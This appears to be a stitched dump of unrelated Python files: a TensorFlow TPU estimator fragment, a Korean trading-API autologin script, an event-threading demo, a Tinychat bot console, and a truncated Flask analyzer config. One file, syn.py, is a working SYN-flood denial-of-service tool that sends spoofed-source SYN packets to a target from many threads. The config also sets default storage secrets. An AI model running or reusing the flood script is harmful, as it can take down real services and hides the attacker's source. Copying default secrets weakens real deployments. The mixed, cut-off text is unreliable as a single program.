if mode != model_fn_lib.ModeKeys.PREDICT:
is_export_mode = False
else:
# For export_savedmodel, input_fn is never passed to Estimator. So, by
# checking the self._is_input_fn_invoked bit, we can know, given the
# mode == PREDICT, it is the .predict API, not export_savedmodel API.
if self._is_input_fn_invoked:
is_export_mode = False
else:
is_export_mode = True
# Clear the bit.
self._is_input_fn_invoked = None
if ctx.is_running_on_cpu(is_export_mode=is_export_mode):
logging.info('Running %s on CPU', mode)
return model_fn_wrapper.call_without_tpu(
features, labels, is_export_mode=is_export_mode)
assert labels is None, '`labels` passed to `model_fn` must be `None`.'
# TPUEstimator._call_input_fn passes `input_fn` as features to here.
assert callable(features), '`input_fn` is not callable.'
input_fn = features
input_holders = _InputPipeline(input_fn, batch_axis, ctx)
enqueue_ops, dequeue_fn, input_hooks, run_infeed_loop_on_coordinator = (
input_holders.generate_infeed_enqueue_ops_and_dequeue_fn())
graph = ops.get_default_graph()
for enqueue_op in enqueue_ops:
if isinstance(enqueue_op, list):
graph.get_collection_ref(_TPU_ENQUEUE_OPS).extend(enqueue_op)
else:
graph.add_to_collection(_TPU_ENQUEUE_OPS, enqueue_op)
if mode == model_fn_lib.ModeKeys.TRAIN:
loss, host_call, scaffold = (
_train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn))
host_ops = host_call.create_tpu_hostcall()
if host_ops is None:
host_ops = []
hooks = [
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
host_ops,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator)),
ExamplesPerSecondHook(ctx.global_batch_size,
output_dir=self.model_dir),
InstallSignalHandlerHook(),
training.LoggingTensorHook(
{
'loss': array_ops.identity(loss),
'step': training.get_global_step()
},
every_n_secs=30)
] + input_hooks
summary.scalar(model_fn_lib.LOSS_METRIC_KEY, loss)
with ops.control_dependencies([loss]):
update_ops = _sync_variables_ops()
# Validate the TPU training graph to catch basic errors
_validate_tpu_training_graph()
train_op = control_flow_ops.group(*update_ops)
graph.add_to_collection(_TPU_TRAIN_OP, train_op)
return model_fn_lib.EstimatorSpec(
mode,
loss=loss,
training_hooks=hooks,
train_op=train_op,
scaffold=scaffold)
if mode == model_fn_lib.ModeKeys.EVAL:
total_loss, host_calls, scaffold = _eval_on_tpu_system(
ctx, model_fn_wrapper, dequeue_fn)
iterations_per_loop_var = _create_or_get_iterations_per_loop()
mean_loss = math_ops.div(total_loss,
math_ops.cast(
iterations_per_loop_var,
dtype=total_loss.dtype))
# Creates a dummy metric update_op for all metrics. Estimator expects
# all metrics in eval_metric_ops have update_op and calls them one by
# one. The real metric update_ops are invoked in a separated thread.
# So, here give Estimator the dummy op for all metrics.
with ops.control_dependencies([mean_loss]):
# After TPU evaluation computation is done (the mean_loss tensor),
# reads all variables back from TPU and updates the eval step
# counter properly
internal_ops_to_run = _sync_variables_ops()
internal_ops_to_run.append(
_increase_eval_step_op(iterations_per_loop_var))
with ops.control_dependencies(internal_ops_to_run):
dummy_update_op = control_flow_ops.no_op()
host_call_ret = host_calls.create_tpu_hostcall()
eval_metric_ops = {}
eval_update_ops = []
for k, v in host_call_ret['eval_metrics'].items():
eval_metric_ops[k] = (v[0], dummy_update_op)
eval_update_ops.append(v[1])
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
hooks = [
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
eval_update_ops + host_ops,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator)),
] + input_hooks
return model_fn_lib.EstimatorSpec(
mode,
loss=mean_loss,
evaluation_hooks=hooks,
eval_metric_ops=eval_metric_ops,
scaffold=scaffold)
# Predict
assert mode == model_fn_lib.ModeKeys.PREDICT
dummy_predict_op, host_calls, scaffold = _predict_on_tpu_system(
ctx, model_fn_wrapper, dequeue_fn)
with ops.control_dependencies([dummy_predict_op]):
internal_ops_to_run = _sync_variables_ops()
with ops.control_dependencies(internal_ops_to_run):
dummy_predict_op = control_flow_ops.no_op()
# In train and evaluation, the main TPU program is passed to monitored
# training session to run. Infeed enqueue and outfeed dequeue are
# executed in side threads. This is not the configuration for
# prediction mode.
#
# For prediction, the Estimator executes the EstimatorSpec.predictions
# directly and yield the element (via generator) to call site. So, the
# outfeed based prediction must be passed to MonitoredSession directly.
# Other parts of the TPU execution are organized as follows.
#
# 1. All outfeed based Tensors must be grouped with predictions Tensors
# to form a single invocation. This avoid the issue we might trigger
# multiple outfeeds incorrectly. To achieve this, `host_call` is
# placed in control_dependencies of `stopping_signals`, and
# `stopping_signals` is passed into _StoppingPredictHook, which sets
# the `stopping_signals` as SessionRunArgs. MonitoredSession merges
# all SessionRunArgs with the fetch in session.run together.
#
# 2. The TPU program (dummy_predict_op) and enqueue_ops (infeed Enqueue)
# are grouped together. They will be launched once and only once in
# side threads and they quit naturally according to the SAME stopping
# condition.
enqueue_ops.append(dummy_predict_op)
host_call_ret = host_calls.create_tpu_hostcall()
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
predictions = host_call_ret['predictions']
_verify_cross_hosts_transfer_size(
predictions, message=(
'The estimated size for TPUEstimatorSpec.predictions is too '
'large.'))
signals = host_call_ret['signals']
with ops.control_dependencies(host_ops):
host_ops = [] # Empty, we do do not need it anymore.
scalar_stopping_signal = _StopSignals.as_scalar_stopping_signal(
signals)
predictions = _PaddingSignals.slice_tensor_or_dict(
predictions, signals)
hooks = [
_StoppingPredictHook(scalar_stopping_signal),
TPUInfeedOutfeedSessionHookForPrediction(ctx, enqueue_ops,
host_ops),
] + input_hooks
return model_fn_lib.EstimatorSpec(
mode,
prediction_hooks=hooks,
predictions=predictions,
scaffold=scaffold)
return _model_fn
def _eval_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
single_tpu_eval_step, host_calls, captured_scaffold_fn = (
model_fn_wrapper.convert_to_single_tpu_eval_step(dequeue_fn))
def multi_tpu_eval_steps_on_single_shard():
return training_loop.repeat(
iterations_per_loop_var,
single_tpu_eval_step, [_ZERO_LOSS])
(loss,) = tpu.shard(
multi_tpu_eval_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
scaffold = _get_scaffold(captured_scaffold_fn)
return loss, host_calls, scaffold
def _train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
single_tpu_train_step, host_call, captured_scaffold_fn = (
model_fn_wrapper.convert_to_single_tpu_train_step(dequeue_fn))
def multi_tpu_train_steps_on_single_shard():
return training_loop.repeat(
iterations_per_loop_var,
single_tpu_train_step, [_INITIAL_LOSS])
(loss,) = tpu.shard(
multi_tpu_train_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
scaffold = _get_scaffold(captured_scaffold_fn)
return loss, host_call, scaffold
def _predict_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
num_cores = ctx.num_cores
single_tpu_predict_step, host_calls, captured_scaffold_fn = (
model_fn_wrapper.convert_to_single_tpu_predict_step(dequeue_fn))
def multi_tpu_predict_steps_on_single_shard():
def cond(scalar_stopping_signal):
return math_ops.logical_not(
_StopSignals.should_stop(scalar_stopping_signal))
inputs = [_StopSignals.NON_STOPPING_SIGNAL]
outputs = training_loop.while_loop(
cond, single_tpu_predict_step, inputs=inputs, name=b'loop')
return outputs
(dummy_predict_op,) = tpu.shard(
multi_tpu_predict_steps_on_single_shard,
inputs=[],
num_shards=num_cores,
outputs_from_all_shards=False)
scaffold = _get_scaffold(captured_scaffold_fn)
return dummy_predict_op, host_calls, scaffold
def _wrap_computation_in_while_loop(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def computation(i):
with ops.control_dependencies(op_fn()):
return i + 1
iterations_per_loop_var = _create_or_get_iterations_per_loop()
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with ops.device(device):
iterations = array_ops.identity(iterations_per_loop_var)
return control_flow_ops.while_loop(
lambda i: i < iterations,
computation, [constant_op.constant(0)],
parallel_iterations=1)
def _wrap_computation_in_while_loop_with_stopping_signals(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def cond(scalar_stopping_signal):
return math_ops.logical_not(
_StopSignals.should_stop(scalar_stopping_signal))
def computation(unused_scalar_stopping_signal):
return_value = op_fn()
execute_ops = return_value['ops']
signals = return_value['signals']
with ops.control_dependencies(execute_ops):
return _StopSignals.as_scalar_stopping_signal(signals)
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with ops.device(device):
return control_flow_ops.while_loop(
cond,
computation, [_StopSignals.NON_STOPPING_SIGNAL],
parallel_iterations=1)
def _validate_tpu_training_graph():
"""Validate graph before running distributed training.
Raises:
ValueError: If the graph seems invalid for running on device
"""
operations = ops.get_default_graph().get_operations()
# Check if there is atleast one CrossReplicaSum operation in the graph
# This should be introduced by using the CrossShardOptimizer wrapper
cross_replica_sum_ops = [
o for o in operations if o.type == _CROSS_REPLICA_SUM_OP
]
if not cross_replica_sum_ops:
raise ValueError(
'CrossShardOptimizer must be used for model training on TPUs.')
class _CapturedObject(object):
"""A placeholder to capture an object.
This is useful when we need to capture a Python object in the Tensorflow
control flow body function and use it outside the control flow.
"""
def __init__(self):
self._object = None
self._captured = False
def capture(self, o):
if self._captured:
raise RuntimeError(
'InternalError: Object can be captured only. Please file bug .')
self._captured = True
self._object = o
def get(self):
if not self._captured:
raise RuntimeError(
'InternalError: Object is not captured properly before `get`. '
'Please file bug .')
return self._object
def _get_scaffold(captured_scaffold_fn):
"""Retrieves the Scaffold from `captured_scaffold_fn`."""
with _CapturingContext(message='Inside scaffold_fn'):
scaffold_fn = captured_scaffold_fn.get()
if scaffold_fn:
scaffold = scaffold_fn()
if scaffold is None:
raise ValueError(
'TPUEstimatorSpec.scaffold_fn returns None, which is not allowed')
else:
scaffold = None
if scaffold:
wrapped_finalize = scaffold.finalize
def _finalize():
with _CapturingContext('Inside Scaffold.finalize'):
wrapped_finalize()
scaffold.finalize = _finalize
return scaffold
class _CapturingContext(control_flow_ops.ControlFlowContext):
"""Tracks references to Tensors defined in TPU replication."""
def __init__(self, message):
control_flow_ops.ControlFlowContext.__init__(self)
self._message = message
def AddOp(self, op): # pylint: disable=invalid-name
for c in op.inputs:
if tpu._TPU_REPLICATE_ATTR in c.op.node_def.attr: # pylint: disable=protected-access
raise ValueError('{}: Op {} depends on TPU computation {}, '
'which is not allowed.'.format(self._message, op, c))
def __enter__(self):
# pylint: disable=protected-access
self._g = ops.get_default_graph()
self._old = self._g._get_control_flow_context()
self._g._set_control_flow_context(self)
# pylint: enable=protected-access
def __exit__(self, _, __, ___): # pylint: disable=invalid-name
self._g._set_control_flow_context(self._old) # pylint: disable=protected-access
class _Inputs(object):
"""A data structure representing the input_fn returned values.
This also supports the returned value from input_fn as `Dataset`.
"""
def __init__(self, features=None, labels=None, dataset=None, signals=None):
if dataset is not None and (features is not None or labels is not None or
signals is not None):
raise RuntimeError('Internal Error: Either (features and labels) or '
'dataset should be provided, not both. Please file '
'bug')
self._features = features
self._labels = labels
self._signals = signals
self._dataset = dataset
self._iterator = None
@staticmethod
def from_input_fn(return_values):
"""Returns an `_Inputs` instance according to `input_fn` return value."""
if isinstance(return_values, dataset_ops.Dataset):
dataset = return_values
return _Inputs(dataset=dataset)
features, labels = _Inputs._parse_inputs(return_values)
return _Inputs(features, labels)
@staticmethod
def _parse_inputs(return_values):
if isinstance(return_values, tuple):
features, labels = return_values
else:
features, labels = return_values, None
return features, labels
@property
def is_dataset(self):
"""Returns True if the return value from input_fn is Dataset."""
return self._dataset is not None
def dataset_initializer_hook(self):
"""Returns a `SessionRunHook` to initialize this dataset.
This must be called before `features_and_labels`.
"""
iterator = self._dataset.make_initializable_iterator()
# pylint: disable=protected-access
hook = estimator_lib._DatasetInitializerHook(iterator)
self._iterator = iterator
return hook
def features_and_labels(self):
"""Gets `features` and `labels`."""
if self.is_dataset:
if self._iterator is None:
raise RuntimeError('Internal error: Must call dataset_initializer_hook '
'before calling features_and_labels(). Please file '
'a bug!')
return _Inputs._parse_inputs(self._iterator.get_next())
return (self._features, self._labels)
def signals(self):
return self._signals
@property
def dataset(self):
return self._dataset
class _InputsWithStoppingSignals(_Inputs):
"""Inputs with `_StopSignals` inserted into the dataset."""
def __init__(self, dataset, batch_size, add_padding=False):
assert dataset is not None
user_provided_dataset = dataset.map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=False, batch_size=batch_size, add_padding=add_padding))
final_batch_dataset = dataset.take(1).map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=True, batch_size=batch_size, add_padding=add_padding))
dataset = user_provided_dataset.concatenate(final_batch_dataset).prefetch(2)
super(_InputsWithStoppingSignals, self).__init__(dataset=dataset)
self._current_inputs = None
def features_and_labels(self):
if self._current_inputs is not None:
raise RuntimeError(
'Internal Error: The previous inputs have not been properly '
'consumed. First call features_and_labels, then call signals.')
inputs_with_signals = self._iterator.get_next()
features = inputs_with_signals['features']
labels = inputs_with_signals.get('labels')
self._current_inputs = inputs_with_signals
return features, labels
def signals(self):
"""Returns the `Signals` from `_Inputs`."""
if self._current_inputs is None:
raise RuntimeError(
'Internal Error: The current inputs have not been properly '
'generated. First call features_and_labels, then call signals.')
signals = self._current_inputs['signals']
self._current_inputs = None
return signals
@staticmethod
def insert_stopping_signal(stop, batch_size, add_padding=False):
"""Inserts stopping_signal into dataset via _map_fn.
Here we change the data structure in the dataset, such that the return value
is a dictionary now and `features`, `labels`, and `signals` are three
distinguished keys in that dict. This provides a better structure, which
eases the process to decompose the inputs (see `features_and_labels`).
Args:
stop: bool, state of current stopping signals.
batch_size: int, batch size.
add_padding: bool, whether to pad the tensor to full batch size.
Returns:
A map_fn passed to dataset.map API.
"""
def _map_fn(*args):
"""The map fn to insert signals."""
if len(args) == 1:
# Unpack the single Tensor/dict argument as features. This is required
# for the input_fn returns no labels.
args = args[0]
features, labels = _Inputs._parse_inputs(args)
new_input_dict = {}
if add_padding:
padding_mask, features, labels = (
_PaddingSignals.pad_features_and_labels(
features, labels, batch_size))
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
else:
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
padding_mask = None
new_input_dict['signals'] = _StopSignals(
stop=stop, batch_size=batch_size, padding_mask=padding_mask).as_dict()
return new_input_dict
return _map_fn
class _StopSignals(object):
"""Signals class holding all logic to handle TPU stopping condition."""
NON_STOPPING_SIGNAL = False
STOPPING_SIGNAL = True
def __init__(self, stop, batch_size, padding_mask=None):
self._stop = stop
self._batch_size = batch_size
self._padding_mask = padding_mask
def as_dict(self):
"""Returns the signals as Python dict."""
shape = [self._batch_size, 1]
dtype = dtypes.bool
if self._stop:
stopping = array_ops.ones(shape=shape, dtype=dtype)
else:
stopping = array_ops.zeros(shape=shape, dtype=dtype)
signals = {'stopping': stopping}
if self._padding_mask is not None:
signals['padding_mask'] = self._padding_mask
return signals
@staticmethod
def as_scalar_stopping_signal(signals):
return array_ops.identity(signals['stopping'][0][0])
@staticmethod
def should_stop(scalar_stopping_signal):
if isinstance(scalar_stopping_signal, ops.Tensor):
# STOPPING_SIGNAL is a constant True. Here, the logical_and is just the TF
# way to express the bool check whether scalar_stopping_signal is True.
return math_ops.logical_and(
scalar_stopping_signal, _StopSignals.STOPPING_SIGNAL)
else:
# For non Tensor case, it is used in SessionRunHook. So, we cannot modify
# the graph anymore. Here, we use pure Python.
return bool(scalar_stopping_signal)
class _PaddingSignals(object):
"""Signals class holding all logic to handle padding."""
@staticmethod
def pad_features_and_labels(features, labels, batch_size):
"""Pads out the batch dimension of features and labels."""
real_batch_size = array_ops.shape(
_PaddingSignals._find_any_tensor(features))[0]
batch_size_tensor = constant_op.constant(batch_size, dtypes.int32)
check_greater = check_ops.assert_greater_equal(
batch_size_tensor, real_batch_size,
data=(batch_size_tensor, real_batch_size),
message='The real batch size should not be greater than batch_size.')
with ops.control_dependencies([check_greater]):
missing_count = batch_size_tensor - real_batch_size
def pad_single_tensor(tensor):
"""Pads out the batch dimension of a tensor to the complete batch_size."""
rank = len(tensor.shape)
assert rank > 0
padding = array_ops.stack([[0, missing_count]] + [[0, 0]] * (rank - 1))
padded_shape = (batch_size,) + tuple(tensor.shape[1:])
padded_tensor = array_ops.pad(tensor, padding)
padded_tensor.set_shape(padded_shape)
return padded_tensor
def nest_pad(tensor_or_dict):
return nest.map_structure(pad_single_tensor, tensor_or_dict)
features = nest_pad(features)
if labels is not None:
labels = nest_pad(labels)
padding_mask = _PaddingSignals._padding_mask(
real_batch_size, missing_count, batch_size)
return padding_mask, features, labels
@staticmethod
def slice_tensor_or_dict(tensor_or_dict, signals):
"""Slice the real Tensors according to padding mask in signals."""
padding_mask = signals['padding_mask']
batch_size = array_ops.shape(padding_mask)[0]
def verify_batch_size(tensor):
check_batch_size = math_ops.equal(batch_size, tensor.shape[0])
with ops.control_dependencies([check_batch_size]):
return array_ops.identity(tensor)
def slice_single_tensor(tensor):
rank = len(tensor.shape)
assert rank > 0
real_batch_size = batch_size - math_ops.reduce_sum(padding_mask)
return verify_batch_size(tensor)[0:real_batch_size]
# As we split the Tensors to all TPU cores and concat them back, it is
# important to ensure the real data is placed before padded ones, i.e.,
# order is preserved. By that, the sliced padding mask should have all 0's.
# If this assertion failed, # the slice logic here would not hold.
sliced_padding_mask = slice_single_tensor(padding_mask)
assert_padding_mask = math_ops.equal(
math_ops.reduce_sum(sliced_padding_mask), 0)
with ops.control_dependencies([assert_padding_mask]):
should_stop = _StopSignals.should_stop(
_StopSignals.as_scalar_stopping_signal(signals))
is_full_batch = math_ops.equal(math_ops.reduce_sum(padding_mask), 0)
def slice_fn(tensor):
# If the current batch is full batch or part of stopping signals, we do
# not need to slice to save performance.
return control_flow_ops.cond(
math_ops.logical_or(should_stop, is_full_batch),
(lambda: verify_batch_size(tensor)),
(lambda: slice_single_tensor(tensor)))
return nest.map_structure(slice_fn, tensor_or_dict)
@staticmethod
def _find_any_tensor(batch_features):
tensors = [x for x in nest.flatten(batch_features)
if isinstance(x, ops.Tensor)]
if not tensors:
raise ValueError('Cannot find any Tensor in features dict.')
return tensors[0]
@staticmethod
def _padding_mask(real_batch_size, missing_count, batch_size):
padding_mask = array_ops.concat(
[
array_ops.zeros((real_batch_size,), dtype=dtypes.int32),
array_ops.ones((missing_count,), dtype=dtypes.int32)
],
axis=0)
padding_mask.set_shape((batch_size,))
return padding_mask
class _SignalsHelper(object):
"""A general helper class to handle common signals manipulation."""
def __init__(self, signals):
self._signal_keys = []
for key in sorted(signals.iterkeys()):
self._signal_keys.append(key)
@property
def num_signals(self):
return len(self._signal_keys)
def unflatten(self, tensor_list):
return dict(zip(self._signal_keys, tensor_list))
@staticmethod
def as_tensor_list(signals):
return [signals[key] for key in sorted(signals.iterkeys())]
def _verify_cross_hosts_transfer_size(tensor_dict, message):
total_size = 0
tensor_structure = {}
for key, tensor in tensor_dict.items():
shape = tensor.shape
size = np.product(shape) * tensor.dtype.size
tensor_structure[key] = shape
total_size += size
if total_size >= _ONE_GIGABYTE:
raise ValueError(
'{} The transfer size is larger than the protobuf limit. Please '
'consider to use Tensors with smaller shapes or reduce batch '
'size. Given:\n'
'{}'.format(message, '\n'.join([
' -- Key: {}, Shape: {}'.format(k, v)
for k, v in tensor_structure.items()])))
|
syn.py
|
#!/usr/bin/env python3
# MIT License
#
# Copyright (C) 2020, Entynetproject. All Rights Reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import random
import time
from scapy.all import IP, TCP, send
from threading import Thread
# Import modules for SYN flood
import tools.randomData as randomData
def SYN_ATTACK(threads, attack_time, target):
# Finish
global FINISH
FINISH = False
target_ip = target.split(":")[0]
target_port = int(target.split(":")[1])
print("\033[1;34m"+"[*]"+"\033[0m"+" Starting SYN attack...")
threads_list = []
# SYN flood
def syn_flood():
global FINISH
while True:
if FINISH:
break
IP_Packet = IP()
IP_Packet.src = randomData.random_IP()
IP_Packet.dst = target_ip
TCP_Packet = TCP()
TCP_Packet.sport = random.randint(1000, 10000)
TCP_Packet.dport = target_port
TCP_Packet.flags = "S"
TCP_Packet.seq = random.randint(1000, 10000)
TCP_Packet.window = random.randint(1000, 10000)
try:
send(IP_Packet / TCP_Packet, verbose = False)
except Exception as e:
print(e)
else:
print("\033[1;32m"+"[+]"+"\033[0m"+" SYN packet was sent!")
# Start threads
for thread in range(0, threads):
print("\033[1;34m"+"[*]"+"\033[0m"+" Staring thread " + str(thread) + "...")
t = Thread(target = syn_flood)
t.start()
threads_list.append(t)
# Sleep selected secounds
time.sleep(attack_time)
# Terminate threads
for thread in threads_list:
FINISH = True
thread.join()
print("\033[1;33m"+"[!]"+"\033[0m"+" SYN attack completed.")
|
autologin1.py
|
import time
import pythoncom
from manuallogin import *
from PyQt5 import QtWidgets
from PyQt5.QtCore import QTimer
from multiprocessing import Process
from PyQt5.QAxContainer import QAxWidget
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
from utility.setting import OPENAPI_PATH
class Window(QtWidgets.QMainWindow):
app = QtWidgets.QApplication(sys.argv)
def __init__(self):
super().__init__()
self.bool_connected = False
self.ocx = QAxWidget('KHOPENAPI.KHOpenAPICtrl.1')
self.ocx.OnEventConnect.connect(self.OnEventConnect)
self.CommConnect()
def CommConnect(self):
self.ocx.dynamicCall('CommConnect()')
while not self.bool_connected:
pythoncom.PumpWaitingMessages()
def OnEventConnect(self, err_code):
if err_code == 0:
self.bool_connected = True
self.AutoLoginOn()
def AutoLoginOn(self):
print('\n 자동 로그인 설정 대기 중 ...\n')
QTimer.singleShot(5000, lambda: auto_on(1))
self.ocx.dynamicCall('KOA_Functions(QString, QString)', 'ShowAccountWindow', '')
print(' 자동 로그인 설정 완료\n')
print(' 자동 로그인 설정용 프로세스 종료 중 ...')
if __name__ == '__main__':
login_info = f'{OPENAPI_PATH}/system/Autologin.dat'
if os.path.isfile(login_info):
os.remove(f'{OPENAPI_PATH}/system/Autologin.dat')
print('\n 자동 로그인 설정 파일 삭제 완료\n')
Process(target=Window).start()
print(' 자동 로그인 설정용 프로세스 시작\n')
while find_window('Open API login') == 0:
print(' 로그인창 열림 대기 중 ...\n')
time.sleep(1)
print(' 아이디 및 패스워드 입력 대기 중 ...\n')
time.sleep(5)
manual_login(2)
print(' 아이디 및 패스워드 입력 완료\n')
|
mth_event.py
|
from machin.parallel.event import *
from machin.parallel.thread import Thread
import time
event1 = Event()
event2 = Event()
event3 = Event()
# wait() will block until its value might have changed (due to a sub event)
# wait() returns a bool value
def test1():
global event1, event2, event3
event = OrEvent(event1, event2, event3)
while not event.wait():
continue
# will print if any one of these events are set
print("hello1")
def test2():
global event1, event2, event3
event = AndEvent(AndEvent(event1, event3), event2)
while not event.wait():
continue
# will print if event1, event2 and event3 are all set
print("hello2")
if __name__ == "__main__":
t1 = Thread(target=test1)
t2 = Thread(target=test2)
t1.start()
t2.start()
print("set event1")
event1.set()
time.sleep(1)
print("set event2")
event2.set()
print("set event3")
event3.set()
|
bot.py
|
import logging
import threading
import time
import tinybot
log = logging.getLogger(__name__)
def main():
room_name = tinybot.pinylib.CONFIG.ROOM
if tinybot.pinylib.CONFIG.ACCOUNT and tinybot.pinylib.CONFIG.PASSWORD:
bot = tinybot.TinychatBot(room=room_name, account=tinybot.pinylib.CONFIG.ACCOUNT,
password=tinybot.pinylib.CONFIG.PASSWORD)
else:
bot = tinybot.TinychatBot(room=room_name)
bot.nickname = tinybot.pinylib.CONFIG.BOTNICK
do_login = 1
if do_login:
if not bot.account:
bot.account = raw_input('Account: ').strip()
if not bot.password:
bot.password = raw_input('Password: ')
is_logged_in = bot.login()
while not is_logged_in:
bot.account = raw_input('Account: ').strip()
bot.password = raw_input('Password: ')
if bot.account == '/' or bot.password == '/':
main()
break
elif bot.account == '//' or bot.password == '//':
do_login = False
break
else:
is_logged_in = bot.login()
if is_logged_in:
bot.console_write(tinybot.pinylib.COLOR['bright_green'], 'Logged in as: %s' % bot.account)
if not do_login:
bot.account = None
bot.password = None
threading.Thread(target=bot.connect).start()
while not bot.is_connected:
time.sleep(2)
while bot.is_connected:
chat_msg = raw_input()
if chat_msg.startswith('/'):
msg_parts = chat_msg.split(' ')
cmd = msg_parts[0].lower().strip()
if cmd == '/q':
bot.disconnect()
elif cmd == '/a':
if len(bot.users.signed_in) == 0:
print ('No signed in users in the room.')
else:
for user in bot.users.signed_in:
print ('%s:%s' % (user.nick, user.account))
elif cmd == '/u':
for user in bot.users.all:
print ('%s: %s' % (bot.users.all[user].nick, bot.users.all[user].user_level))
elif cmd == '/m':
if len(bot.users.mods) == 0:
print ('No moderators in the room.')
else:
for mod in bot.users.mods:
print (mod.nick)
elif cmd == '/n':
if len(bot.users.norms) == 0:
print ('No normal users in the room.')
else:
for norm in bot.users.norms:
print (norm.nick)
elif cmd == '/l':
if len(bot.users.lurkers) == 0:
print ('No lurkers in the room.')
else:
for lurker in bot.users.lurkers:
print (lurker.nick)
# FOR DEBUGGING METHODS!
elif cmd == '/t':
pass
else:
bot.send_chat_msg(chat_msg)
if __name__ == '__main__':
if tinybot.pinylib.CONFIG.DEBUG_TO_FILE:
formater = '%(asctime)s : %(levelname)s : %(filename)s : %(lineno)d : %(funcName)s() : %(name)s : %(message)s'
logging.basicConfig(filename=tinybot.pinylib.CONFIG.DEBUG_FILE_NAME,
level=tinybot.pinylib.CONFIG.DEBUG_LEVEL,
format=formater)
log.info('Starting tinybot: %s, pinylib version: %s' % (tinybot.__version__,
tinybot.pinylib.__version__))
else:
log.addHandler(logging.NullHandler())
main()
|
app.py
|
"""
* Copyright 2019 EPAM Systems
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
"""
import logging
import logging.config
from signal import signal, SIGINT
from sys import exit
import os
import threading
import time
import json
from flask import Flask, Response, jsonify
from flask_cors import CORS
import amqp.amqp_handler as amqp_handler
from amqp.amqp import AmqpClient
from commons.esclient import EsClient
from commons import model_chooser
from utils import utils
from service.cluster_service import ClusterService
from service.auto_analyzer_service import AutoAnalyzerService
from service.analyzer_service import AnalyzerService
from service.suggest_service import SuggestService
from service.suggest_info_service import SuggestInfoService
from service.search_service import SearchService
from service.clean_index_service import CleanIndexService
from service.namespace_finder_service import NamespaceFinderService
from service.delete_index_service import DeleteIndexService
from service.retraining_service import RetrainingService
from service.suggest_patterns_service import SuggestPatternsService
APP_CONFIG = {
"esHost": os.getenv("ES_HOSTS", "http://elasticsearch:9200").strip("/").strip("\\"),
"esUser": os.getenv("ES_USER", "").strip(),
"esPassword": os.getenv("ES_PASSWORD", "").strip(),
"logLevel": os.getenv("LOGGING_LEVEL", "DEBUG").strip(),
"amqpUrl": os.getenv("AMQP_URL", "").strip("/").strip("\\"),
"exchangeName": os.getenv("AMQP_EXCHANGE_NAME", "analyzer"),
"analyzerPriority": int(os.getenv("ANALYZER_PRIORITY", "1")),
"analyzerIndex": json.loads(os.getenv("ANALYZER_INDEX", "true").lower()),
"analyzerLogSearch": json.loads(os.getenv("ANALYZER_LOG_SEARCH", "true").lower()),
"analyzerSuggest": json.loads(os.getenv("ANALYZER_SUGGEST", "true").lower()),
"analyzerCluster": json.loads(os.getenv("ANALYZER_CLUSTER", "true").lower()),
"turnOffSslVerification": json.loads(os.getenv("ES_TURN_OFF_SSL_VERIFICATION", "false").lower()),
"esVerifyCerts": json.loads(os.getenv("ES_VERIFY_CERTS", "false").lower()),
"esUseSsl": json.loads(os.getenv("ES_USE_SSL", "false").lower()),
"esSslShowWarn": json.loads(os.getenv("ES_SSL_SHOW_WARN", "false").lower()),
"esCAcert": os.getenv("ES_CA_CERT", ""),
"esClientCert": os.getenv("ES_CLIENT_CERT", ""),
"esClientKey": os.getenv("ES_CLIENT_KEY", ""),
"minioHost": os.getenv("MINIO_SHORT_HOST", "minio:9000"),
"minioAccessKey": os.getenv("MINIO_ACCESS_KEY", "minio"),
"minioSecretKey": os.getenv("MINIO_SECRET_KEY", "minio123"),
"appVersion": "",
